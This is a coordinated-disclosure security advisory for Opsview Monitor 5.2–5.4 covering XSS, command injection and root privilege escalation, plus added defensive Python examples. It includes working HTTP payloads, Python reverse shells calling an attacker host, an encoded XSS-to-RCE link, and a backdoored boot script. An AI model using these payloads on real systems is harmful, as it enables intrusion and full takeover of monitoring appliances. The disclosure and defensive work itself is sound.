Release mode: Coordinated release

2. **Vulnerability Information**

Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145

3. **Vulnerability Description**

Opsview's website states that:

Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.

4. **Vulnerable Packages**

. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2

Other products and versions might be affected, but they were not tested.

5. **Vendor Information, Solutions and Workarounds**

Opsview released the following versions of its product that fix the reported issues:

. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1

In addition, Opsview published the following release notes:

. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new

6. **Credits**

These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from the Core Advisories Team.

7. **Technical Description / Proof of Concept**

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. The issues presented in 7.1 and 7.2 are Cross-Site Scripting vulnerabilities in the web management console. The issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process, presented in 7.5, would allow an attacker to elevate privileges from the nagios user to root after a system restart, thereby obtaining full control of the appliance.

7.1. **Reflected Cross-Site Scripting** [CVE-2018-16148]

The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is reflected into the response without sanitization, so script injected there executes in the context of the victim's session. The following proof of concept demonstrates the vulnerability:

/-----
GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=<redacted>%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/

7.2. **Stored Cross-Site Scripting** [CVE-2018-16147]

The 'setObjecttypeState' method exposed through the '/settings/api/router' endpoint stores the object type name supplied in its first argument without sanitization.
The following proof of concept demonstrates the vulnerability:

/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close

[{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}]
-----/

The input is stored without any sanitization and rendered every time the /settings section is visited by the user. Note that this XSS is self-stored: the injected value is saved in the submitting user's own settings and executes only in the context of that user's session.

Excerpt of the page source showing the injected script tag:

/-----
[{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"
-----/

7.3. **Notification abuse leading to remote command execution** [CVE-2018-16146]

The Opsview web management console provides functionality, accessible to an authenticated administrator, to test the notifications that are triggered under certain configurable events. The 'value' parameter of the test variables is not properly sanitized, leading to arbitrary command injection executed on the system with the privileges of the nagios user.
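The mechanism behind this issue and the one in 7.4 is the same: a value taken from the request is pasted into a command line that a shell then parses, so the '||' in the PAGER value of the proof of concept below (and the ';' and backticks in the 'rancid_password' of 7.4) become command separators instead of data. The following Python example is added here by the editor and is not Opsview's code; the advisory does not show the vulnerable source, so 'printf' stands in for the notification helper, the payload is a constructed copy of the advisory's shape with an 'echo' marker in place of the reverse shell, and the digits-only allow-list is an assumed policy for a pager value. It runs the same attacker string through a shell-string interpolation and through an argv list, and shows 'shlex.quote' for the case where a shell cannot be avoided.

```python
"""Added example (not Opsview code): the OS command-injection class behind 7.3 and 7.4.

'printf' stands in for the notification / rancid helper that the appliance launched.
What the example reproduces is the mechanism: a user-controlled value is pasted into
a shell command line, so shell metacharacters in it become command structure.
"""
import re
import shlex
import subprocess

# Constructed inputs modelled on the advisory's payloads; a harmless 'echo' marker
# replaces the reverse shell.  ';' runs the right-hand side unconditionally, while
# the '||' used in 7.3 runs it only when the left-hand command fails.
BENIGN_PAGER = "123123123"
INJECTED_PAGER = "2342342342 ; echo INJECTED"

# Assumed allow-list for a pager value: 3 to 20 digits, nothing else.
PAGER_RE = re.compile(r"^[0-9]{3,20}$")


def validate_pager(pager: str) -> bool:
    """True only for values that match the assumed digits-only policy."""
    return PAGER_RE.fullmatch(pager) is not None


def vulnerable_notify(pager: str) -> str:
    """Interpolates the value into a shell string (the 7.3/7.4 bug pattern).

    The string is handed to /bin/sh, which tokenises it; anything after ';'
    in the attacker's value is executed as a second command.
    """
    cmd = "printf 'notify pager=%s\\n' " + pager  # no quoting, parsed by /bin/sh
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def argv_without_validation(pager: str) -> str:
    """Same value passed as one argv element: no shell ever parses it.

    The marker text is still present, but only as literal output of printf.
    """
    argv = ["printf", "notify pager=%s\n", pager]
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


def hardened_notify(pager: str) -> str:
    """Allow-list validation plus argv list: reject bad input, never build a shell string."""
    if not validate_pager(pager):
        raise ValueError("pager must be 3-20 digits")
    return argv_without_validation(pager)


def quoted_for_shell(pager: str) -> str:
    """If a shell string is unavoidable, shlex.quote() turns the value into one word."""
    return "printf 'notify pager=%s\\n' " + shlex.quote(pager)


if __name__ == "__main__":
    print(repr(vulnerable_notify(INJECTED_PAGER)))      # two lines: the marker command ran
    print(repr(argv_without_validation(INJECTED_PAGER)))  # one line: the marker is plain text
    print(quoted_for_shell(INJECTED_PAGER))
```

The argv form alone already stops the injection; the allow-list is what keeps unexpected values out of the downstream tool entirely, which matters because the helper's own option parsing is a second attack surface.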
The following proof of concept executes a reverse shell:

/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=<redacted>%3D%3D
Connection: close

{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"}
-----/

/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/

Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting) to build a specially crafted link that, when sent to an administrator, triggers a reverse shell. In order to perform the attack, consider the following:

. The API's sensitive actions require a 'restToken' to be processed.
. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site Scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/, given it is still present). If the user is already authenticated, they will be redirected automatically. Otherwise, the login page will appear and the redirection will take place after a successful login.

The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:

/-----
https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1
-----/

Once clicked, the authenticated administrator is redirected to the vulnerable section, where their browser performs a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the browser issues the request to 'rest/config/notificationmethod/testnotification' shown above, resulting in a reverse shell.

7.4. **Rancid test connection functionality abuse leading to command execution** [CVE-2018-16144]

NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to improper sanitization of the 'rancid_password' parameter. The following proof of concept executes a reverse shell:

/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=<redacted>%3D%3D
Connection: close

ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2
-----/

/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/

7.5. **Script modification could allow local privilege escalation** [CVE-2018-16145]

Most of the services in Opsview Monitor run with nagios privileges, and the scripts that run at boot time switch to an unprivileged account during their execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges. The following excerpt shows the vulnerable code:

/-----
/etc/init.d/opsview-reporting-module:

/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
  echo "Attempted to start jasperserver but MySQL credentials are wrong."
  exit 0
fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
  su - opsview -c "$DAEMON $@"
else
  exec $DAEMON $@
fi
-----/

The file '/opt/opsview/jasper/bin/db_jasper', which the init script runs as root, is group-writable (mode 0775, owner and group 'opsview'), and the nagios user is a member of the 'opsview' group, so nagios can modify it:
/-----
$ ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/

Since 'db_jasper' receives 'db_exists' as an argument, which it dispatches through a case statement, an attacker with write access to the file only needs to edit that branch: the injected commands run as root the next time the appliance boots. The following excerpt shows the attacker's modified case statement, which backgrounds a reverse shell and then falls through to the original 'db_exists' call so that the script's normal behaviour is preserved:

/-----
while [ "x$1" != "x" ] ; do
  case "$1" in
    db_export) db_export ;;
    db_export_test) db_export_test ;;
    db_export_initial) TEST=1 db_backup ;;
    db_import) db_import ;;
    db_install) db_install ;;
    db_backup) db_backup ;;
    db_restore) db_restore ;;
    db_exists)
      python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
      db_exists
      exit $?
      ;;
    db_upgrade)
      db_upgrade
      exit $?
      ;;
    *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;;
  esac
  shift
done
-----/

/-----
$ nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/

8. **Report Timeline**

2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send the draft advisory.
2018-05-04: Opsview replied, attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed receipt of the advisory and said an initial response would be ready by May 11th.
2018-05-11: Opsview replied that they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview said they were planning to release a fix for these versions by the end of July.
2018-05-11: Core Security acknowledged the confirmation.
2018-06-25: Opsview said they were planning to release a major update of the product (6.0) at the end of July, which would address all reported vulnerabilities. They also said the previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security acknowledged the status update and asked for a tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed setting a tentative publication date at the end of August, when the fixes for its earlier versions would be released.
2018-07-18: Core Security agreed with Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release would be available on July 25th. They added that they did not yet have an exact release date for the updates to previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining fixes.
2018-08-13: Opsview replied that they were targeting the week of August 24th for releasing the fixes for their earlier product versions and would confirm the exact date at the end of the following week.
2018-08-13: Core Security acknowledged the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed versions would be available on August 29th.
2018-08-24: Core Security acknowledged the update and proposed September 4th as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.

9. **References**

[1] https://www.opsview.com/solutions

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security, including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide the actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, the Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. **Disclaimer**

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
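The root cause in 7.5 above is a file that root executes at boot but that a non-root account can modify. The following Python audit helper is an added example by the editor, not Opsview code and not the vendor's fix: it takes an init script, extracts the absolute paths it names, and reports every referenced file that is group- or world-writable or not owned by root. The init script and the files it checks are constructed in a temporary directory to reproduce the advisory's situation (a 0775 'db_jasper' stand-in invoked before privileges are dropped, next to a 0755 daemon stand-in); the path regex is a heuristic that handles literal paths like those in the excerpt, not shell variables or globs.

```python
"""Added example (not Opsview code): audit helper for the 7.5 class of issue.

A script executed by root at boot is only as trustworthy as every file it
invokes.  The check below flags any file referenced by the script that a
non-root user could modify, which is exactly the condition that let the
nagios user turn 'db_jasper' into a root shell.
"""
import os
import re
import stat
import tempfile

# Heuristic: absolute paths written out literally in the script.  Real shell
# parsing would be needed for variables and globs; this covers the pattern in
# the advisory, where the helper path appears verbatim.
ABS_PATH_RE = re.compile(r"(?<![\w-])/(?:[\w.-]+/)*[\w.-]+")

# Constructed stand-in for the vulnerable init excerpt; paths are filled in by demo().
INIT_TEMPLATE = """#!/bin/sh
{helper} db_exists 2> /dev/null
if [ $? != 0 ]; then
  exit 0
fi
DAEMON={daemon}
test -x $DAEMON || exit 0
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
  su - opsview -c "$DAEMON $@"
else
  exec $DAEMON $@
fi
"""


def referenced_paths(script_text: str) -> list[str]:
    """Absolute paths named in the script, deduplicated, in order of appearance."""
    seen: list[str] = []
    for m in ABS_PATH_RE.finditer(script_text):
        if m.group(0) not in seen:
            seen.append(m.group(0))
    return seen


def writable_by_non_root(path: str) -> list[str]:
    """Reasons a non-root user could change what root will execute from `path`."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_uid != 0:
        reasons.append("owned by uid %d, not root" % st.st_uid)
    return reasons


def audit_init_script(script_path: str) -> dict[str, list[str]]:
    """Map each existing regular file the script references to its findings."""
    with open(script_path) as fh:
        text = fh.read()
    findings = {}
    for p in referenced_paths(text):
        if p == script_path or not os.path.isfile(p):
            continue
        findings[p] = writable_by_non_root(p)
    return findings


def demo() -> dict[str, list[str]]:
    """Build the constructed scenario in a temp dir and audit it."""
    base = tempfile.mkdtemp()
    helper = os.path.join(base, "db_jasper")        # stands in for the 0775 helper
    daemon = os.path.join(base, "rc.jasperserver")  # stands in for the 0755 daemon
    init = os.path.join(base, "opsview-reporting-module")
    for path, mode in ((helper, 0o775), (daemon, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    with open(init, "w") as fh:
        fh.write(INIT_TEMPLATE.format(helper=helper, daemon=daemon))
    return audit_init_script(init)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", ", ".join(reasons) or "ok")
```

Run against real init scripts, the owner check is as important as the mode bits: a file owned by a service account is writable by that account regardless of its permissions. The same check belongs in the image build pipeline, where a 0775 file in a root-run path can be caught before the appliance ships.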